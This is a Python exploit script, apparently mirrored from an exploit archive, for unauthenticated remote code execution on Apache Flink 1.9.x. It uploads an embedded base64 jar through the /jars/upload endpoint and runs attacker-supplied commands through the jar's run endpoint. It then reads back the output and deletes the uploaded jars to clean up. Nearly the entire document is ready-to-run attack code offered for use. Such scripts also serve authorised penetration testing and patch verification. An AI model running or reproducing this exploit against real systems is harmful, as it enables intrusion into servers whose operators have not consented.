Share
## https://sploitus.com/exploit?id=PACKETSTORM:159779
#!/usr/bin/env python3 
# _*_ coding: utf-8 _*_ 
 
# Exploit Title: Apache Flink 1.9.x - File Upload RCE (Unauthenticated) 
# Google Dork: None 
# Date: 2020.11.01 
# Exploit Author: bigger.wing 
# Vendor Homepage: https://flink.apache.org/ 
# Software Link: https://flink.apache.org/downloads.html 
# Version: 1.9.x 
# Tested on: Centos7.x, 1.9.1 
# CVE: None 
 
import io 
import re 
import sys 
import base64 
import requests 
 
 
class FlinkRCECheck: 
 
def __init__(self, url): 
self.url = url 
self.timeout = 10 
self.upload_file = 'rce_check_from_sec.jar' 
self.headers = { 
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) ' 
'Chrome/61.0 Safari/537.36' 
} 
 
@property 
def get_version(self): 
url = '%s/%s' % (self.url, 'config') 
try: 
res = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False) 
version = res.json().get('flink-version') 
except: 
version = 'unknown' 
return version 
 
@property 
def jar_check(self): 
url = '%s/%s' % (self.url, 'jars') 
jar_list = [] 
try: 
res = requests.get(url, headers=self.headers, verify=False, timeout=self.timeout) 
if res.status_code == 200 and 'application/json' in res.headers.get('Content-Type', ''): 
res = res.json() 
for file in res['files']: 
if file['id'].endswith(self.upload_file): 
jar_list.append(file['id']) 
except Exception as e: 
pass 
 
return jar_list 
 
@property 
def jar_upload(self): 
url = '%s/%s' % (self.url, 'jars/upload') 
jar_content = base64.b64decode('UEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My' 
'0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALg' 
'AAAFBLAwQKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAE1FVEEtSU5GL1BLAwQUAAgICAAidW1PAAA' 
'AAAAAAAAAAAAADQAAAEV4ZWN1dGUuY2xhc3ONVet2E1UU/k4yyUwmQy+TQlsQBdSStqSxiIotIlAK' 
'VkJbSa0G8DKZHpPTJjNhLjTVCvoQ/ugT8MsfqCtx0aUPwEOx3Gdo09KGtUzW7H3O3vvbt7PPzPMXz' 
'/4FMIlfdbyDyxo+1XBFx1Vc05HCjIbrks+quKHipobPNMzp0PC5hlsqChpu6+jBvCQLGhal6gsVd3' 
'QUsaRjAF9qWJb8K0m+lqQkyd0URbin4r6OkzLoN5J/K8l3Or6HpaKswmZIXhKOCC4zxLOjywzKjLv' 
'CGXoLwuHzYb3MvSWrXCOJWXBtq7ZseULud4RKUBU+Q6ow2+R2GPBpEtUt4TAcy94rrFoPrXzNcir5' 
'YuAJpzItA7AGw/F9qkXPtbnvXwtFbYV75CDeCDZkuENo8m15FQqX6eKaHLuEtesrtJI2h0NIG7ujC' 
'QNRyxdty3GiqPps0+aNQLiOr4J86EU39Gx+Q8gyjZ3yJiTSwLsYYQCD6voTjlXnKriBH1AxUIWgJN' 
'aFY2AVawxDr6uToe9gCeSPsp/gTQoYy9syTI5k+bJw8n6VkogAws2/zCkVKcqWX5WWNQN1UNtjOQK' 
'6oB73H6pSxQMDHnxpH5Dp/asGQjw0sA7KtwlhYAMjBn7ETwyDB9PrJB7fvLJpYBM/G3gEoeKxgV9Q' 
'o0x3mvRKaQvlVW5TsMyeqNPoV3uw4Qe8zpCu8IBa1eCenIKRbJch6nb46cAtuOvcm7F8SmAg29VIs' 
'10noOmk8Tix3/FM1fKK/EHIHZtPj95lONotLM1ukjeFH/jRXSGzhB9YXiDNR7tOW/8hIUMP1TfnNM' 
'KA3HKLCh7cBdPJ7lMQfCjbVSETMUKfX+c1UReBPJKzr2/TgTFXq5Y/z5uUtOJELGHXXNmyuBvKSjo' 
'RF8nJXipJq9HgDl2L3P86kL3LrAXu7nRnurim+A25w2m8Te9G+YvRxaILRvQs7fLE6a4hMdYGexqp' 
's0STkZBhlKjx0gBjGCeewjnkyIrAbInskiT7y4wVxuLnb5vxv6G0kDCTLahbOLUNrZT8B6lS3NSLJ' 
'cVMF0uJc8U2jPknuGAemVK20VMye9voa6F/C6rZK0W7mGFFYswOJtdCRuoHSsMU5Ggbx8zBFoamEs' 
'OJFoa3kJb8+BMo4wW5OvEH3tjGyVIbb5pvtXBqnJ5o0cLpFs7s1fohjhCN01+BSvUMEr1AdV6Ejpt' 
'I4xbpOXqxhj66kP34DSb+RCbqzR36WEwScoIaGSdEDu/RXpE9wXm8H/l9St4m5dsMv+MDWsXI28IO' 
'Yg1zFP8jQjwifhEfU5+nCKWQ/TQ9l6IsP/kPUEsHCEEOnKXWAwAA4gYAAFBLAQIUABQACAgIACJ1b' 
'U+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAAAAAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSw' 
'ECCgAKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAB2AAAATUVUQS1JTkYvUEsBAhQ' 
'AFAAICAgAInVtT0EOnKXWAwAA4gYAAA0AAAAAAAAAAAAAAAAAnQAAAEV4ZWN1dGUuY2xhc3NQSwUG' 
'AAAAAAMAAwC4AAAArgQAAAAA') 
files = {'jarfile': (self.upload_file, io.BytesIO(jar_content), 'application/octet-stream')} 
 
try: 
res = requests.post(url, headers=self.headers, files=files, timeout=self.timeout, verify=False) 
file_id = res.json()['filename'].split('/')[-1] 
return file_id 
except Exception as e: 
res = False 
return res 
 
@property 
# delete history jar packages 
def jar_delete(self): 
for jar_name in self.jar_check: 
url = '%s//jars/%s' % (self.url, jar_name) 
try: 
requests.delete(url=url, headers=self.headers, timeout=self.timeout, verify=False) 
except: 
pass 
return 
 
def rce(self, command): 
jar_file = self.jar_upload 
try: 
execute_cmd_url = '%s/jars/%s/run?entry-class=Execute&program-args="%s"' % (self.url, jar_file, command) 
res = requests.post(url=execute_cmd_url, headers=self.headers, timeout=self.timeout, verify=False) 
res = re.findall('\|@\|(.*?)\|@\|', res.text)[0][0:-2] 
if res: 
print('rce command "%s" exec result: %s' % (command, res)) 
state = 1 
msg = '%s rce success' % self.url 
else: 
state = 0 
msg = '%s rce failed' % self.url 
except: 
state = 0 
msg = '%s rce failed' % self.url 
 
delete = self.jar_delete 
 
return {'state': state, 'version': self.get_version, 'msg': msg} 
 
 
if __name__ == '__main__': 
usage = 'python3 script.py ip port command' 
if len(sys.argv) != 4: 
print('simple usage: %s' % usage) 
else: 
ip = sys.argv[1] 
port = sys.argv[2] 
command = sys.argv[3] 
url = 'http://%s:%s' % (ip, port) 
res = FlinkRCECheck(url=url).rce(command=command) 
print(res)